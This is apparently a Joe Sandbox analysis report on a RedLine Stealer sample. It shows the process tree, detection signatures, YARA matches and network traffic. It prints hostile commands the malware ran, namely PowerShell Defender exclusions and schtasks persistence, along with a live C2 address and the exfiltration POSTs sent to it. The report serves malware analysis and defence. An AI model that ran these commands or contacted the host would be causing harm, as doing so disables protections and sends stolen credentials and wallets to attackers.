Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
owKQ0b029a.exe

Overview

General Information

Sample name:owKQ0b029a.exe
renamed because original name is a hash value
Original sample name:5404B47556A2E1E9EB2F5DA481002616.exe
Analysis ID:1474391
MD5:5404b47556a2e1e9eb2f5da481002616
SHA1:e3a45833fecb92ff8998fc6d4a13c9b80afe87db
SHA256:9c6f132ef4142409bd7a1448d3dc52f774e9e33919031dac82f2afb27083945f
Tags:exeRedLineStealer
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected RedLine Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • owKQ0b029a.exe (PID: 7044 cmdline: "C:\Users\user\Desktop\owKQ0b029a.exe" MD5: 5404B47556A2E1E9EB2F5DA481002616)
    • PO.exe (PID: 7400 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" MD5: 8A9837F38BD2C2ADDA21106E3B75FFA8)
      • powershell.exe (PID: 7636 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 8072 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • powershell.exe (PID: 7684 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7736 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpBBB1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PO.exe (PID: 7904 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" MD5: 8A9837F38BD2C2ADDA21106E3B75FFA8)
      • PO.exe (PID: 7912 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" MD5: 8A9837F38BD2C2ADDA21106E3B75FFA8)
        • conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • QntRsaVyLKlY.exe (PID: 8024 cmdline: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe MD5: 8A9837F38BD2C2ADDA21106E3B75FFA8)
    • schtasks.exe (PID: 2408 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpDEBA.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • QntRsaVyLKlY.exe (PID: 6976 cmdline: "C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe" MD5: 8A9837F38BD2C2ADDA21106E3B75FFA8)
      • conhost.exe (PID: 5640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": ["185.222.57.67:55615"], "Bot Id": "cheat"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
          • 0x142fa:$a4: get_ScannedWallets
          • 0x2c11a:$a4: get_ScannedWallets
          • 0x43d3a:$a4: get_ScannedWallets
          • 0x13158:$a5: get_ScanTelegram
          • 0x2af78:$a5: get_ScanTelegram
          • 0x42b98:$a5: get_ScanTelegram
          • 0x13f7e:$a6: get_ScanGeckoBrowsersPaths
          • 0x2bd9e:$a6: get_ScanGeckoBrowsersPaths
          • 0x439be:$a6: get_ScanGeckoBrowsersPaths
          • 0x11d9a:$a7: <Processes>k__BackingField
          • 0x29bba:$a7: <Processes>k__BackingField
          • 0x417da:$a7: <Processes>k__BackingField
          • 0xfcac:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x27acc:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x3f6ec:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x116ce:$a9: <ScanFTP>k__BackingField
          • 0x294ee:$a9: <ScanFTP>k__BackingField
          • 0x4110e:$a9: <ScanFTP>k__BackingField
          0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Click to see the 17 entries
              SourceRuleDescriptionAuthorStrings
              17.2.QntRsaVyLKlY.exe.3a3eb50.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                17.2.QntRsaVyLKlY.exe.3a3eb50.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  17.2.QntRsaVyLKlY.exe.3a3eb50.1.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                  • 0x117ca:$a4: get_ScannedWallets
                  • 0x10628:$a5: get_ScanTelegram
                  • 0x1144e:$a6: get_ScanGeckoBrowsersPaths
                  • 0xf26a:$a7: <Processes>k__BackingField
                  • 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                  • 0xeb9e:$a9: <ScanFTP>k__BackingField
                  17.2.QntRsaVyLKlY.exe.3a3eb50.1.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0xe68a:$u7: RunPE
                  • 0x11d41:$u8: DownloadAndEx
                  • 0x7330:$pat14: , CommandLine:
                  • 0x11279:$v2_1: ListOfProcesses
                  • 0xe88b:$v2_2: get_ScanVPN
                  • 0xe92e:$v2_2: get_ScanFTP
                  • 0xf61e:$v2_2: get_ScanDiscord
                  • 0x1060c:$v2_2: get_ScanSteam
                  • 0x10628:$v2_2: get_ScanTelegram
                  • 0x106ce:$v2_2: get_ScanScreen
                  • 0x11416:$v2_2: get_ScanChromeBrowsersPaths
                  • 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths
                  • 0x11709:$v2_2: get_ScanBrowsers
                  • 0x117ca:$v2_2: get_ScannedWallets
                  • 0x117f0:$v2_2: get_ScanWallets
                  • 0x11810:$v2_3: GetArguments
                  • 0xfed9:$v2_4: VerifyUpdate
                  • 0x147ea:$v2_4: VerifyUpdate
                  • 0x11bca:$v2_5: VerifyScanRequest
                  • 0x112c6:$v2_6: GetUpdates
                  • 0x147cb:$v2_6: GetUpdates
                  15.2.PO.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 31 entries

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7400, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", ProcessId: 7636, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7400, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", ProcessId: 7636, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7400, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", ProcessId: 7636, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpBBB1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpBBB1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7400, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpBBB1.tmp", ProcessId: 7736, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpBBB1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpBBB1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7400, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpBBB1.tmp", ProcessId: 7736, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7400, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", ProcessId: 7636, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpBBB1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpBBB1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7400, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpBBB1.tmp", ProcessId: 7736, ProcessName: schtasks.exe
                    No Snort rule has matched
                    Timestamp:2024-07-16T19:57:25.200037+0200
                    SID:2045001
                    Source Port:55615
                    Destination Port:49714
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-16T19:57:22.155298+0200
                    SID:2045000
                    Source Port:55615
                    Destination Port:49714
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-16T19:57:25.200037+0200
                    SID:2046056
                    Source Port:55615
                    Destination Port:49714
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-16T19:57:16.176487+0200
                    SID:2022930
                    Source Port:443
                    Destination Port:49711
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-16T19:57:15.229510+0200
                    SID:2835929
                    Source Port:49710
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Device Retrieving External IP Address Detected
                    Timestamp:2024-07-16T19:57:17.363146+0200
                    SID:2045001
                    Source Port:55615
                    Destination Port:49709
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-16T19:57:23.072310+0200
                    SID:2833693
                    Source Port:443
                    Destination Port:49721
                    Protocol:TCP
                    Classtype:Potential Corporate Privacy Violation
                    Timestamp:2024-07-16T19:57:03.687918+0200
                    SID:2840787
                    Source Port:49708
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Potentially Bad Traffic
                    Timestamp:2024-07-16T19:57:14.566741+0200
                    SID:2835930
                    Source Port:49710
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Device Retrieving External IP Address Detected
                    Timestamp:2024-07-16T19:57:13.184707+0200
                    SID:2045000
                    Source Port:55615
                    Destination Port:49709
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-16T19:57:54.382158+0200
                    SID:2022930
                    Source Port:443
                    Destination Port:49724
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-16T19:57:13.586420+0200
                    SID:2835928
                    Source Port:64713
                    Destination Port:53
                    Protocol:UDP
                    Classtype:Device Retrieving External IP Address Detected
                    Timestamp:2024-07-16T19:57:17.781669+0200
                    SID:2849352
                    Source Port:49720
                    Destination Port:55615
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-16T19:57:08.017874+0200
                    SID:2849662
                    Source Port:49709
                    Destination Port:55615
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-16T19:57:18.648163+0200
                    SID:2848200
                    Source Port:49720
                    Destination Port:55615
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-16T19:57:23.070316+0200
                    SID:2835930
                    Source Port:49721
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Device Retrieving External IP Address Detected
                    Timestamp:2024-07-16T19:57:25.605724+0200
                    SID:2849352
                    Source Port:49722
                    Destination Port:55615
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-16T19:57:13.545314+0200
                    SID:2849351
                    Source Port:49709
                    Destination Port:55615
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-16T19:57:14.570164+0200
                    SID:2833693
                    Source Port:443
                    Destination Port:49710
                    Protocol:TCP
                    Classtype:Potential Corporate Privacy Violation
                    Timestamp:2024-07-16T19:57:26.869631+0200
                    SID:2848200
                    Source Port:49723
                    Destination Port:55615
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-16T19:57:22.511032+0200
                    SID:2849351
                    Source Port:49714
                    Destination Port:55615
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-16T19:57:23.487832+0200
                    SID:2835929
                    Source Port:49721
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Device Retrieving External IP Address Detected
                    Timestamp:2024-07-16T19:57:16.674149+0200
                    SID:2849662
                    Source Port:49714
                    Destination Port:55615
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeAvira: detection malicious, Label: HEUR/AGEN.1350997
                    Source: 17.2.QntRsaVyLKlY.exe.3a3eb50.1.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.222.57.67:55615"], "Bot Id": "cheat"}
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeReversingLabs: Detection: 83%
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeReversingLabs: Detection: 83%
                    Source: owKQ0b029a.exeReversingLabs: Detection: 73%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeJoe Sandbox ML: detected
                    Source: owKQ0b029a.exeJoe Sandbox ML: detected
                    Source: owKQ0b029a.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: owKQ0b029a.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb source: owKQ0b029a.exe
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C7286D FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00C7286D
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C8CBE4 FindFirstFileExA,0_2_00C8CBE4
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C7F3FB SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00C7F3FB
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULLJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULLJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULLJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\AcrobatJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbxJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\AdobeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 4x nop then jmp 0A720130h7_2_0A7202A4

                    Networking

                    barindex
                    Source: Malware configuration extractorURLs: 185.222.57.67:55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49720
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49720
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49722
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49723
                    Source: global trafficTCP traffic: 192.168.2.5:49709 -> 185.222.57.67:55615
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.57.67:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.57.67:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.57.67:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.57.67:55615Content-Length: 557210Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.57.67:55615Content-Length: 557202Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.57.67:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.57.67:55615Content-Length: 556792Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.57.67:55615Content-Length: 556784Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: Joe Sandbox ViewASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
